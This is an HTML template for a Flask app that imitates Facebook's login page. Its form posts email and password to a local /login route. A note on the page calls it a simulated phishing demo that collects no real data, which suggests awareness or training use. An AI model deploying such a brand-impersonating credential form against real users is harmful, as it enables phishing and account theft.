<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Facebook – log in or sign up</title>
    <link rel="stylesheet" href="{{ url_for('static', filename='style.css') }}">
</head>
<body>
    <div class="login-box">
        <h2>Facebook</h2>
        <form method="POST" action="/login">
            <input type="text" name="email" placeholder="Email or phone number" required><br>
            <input type="password" name="password" placeholder="Password" required><br>
            <button type="submit">Log In</button>
        </form>
        <p class="note">⚠️ This is a simulated phishing demo. No real data is being collected.</p>
    </div>
</body>
</html>
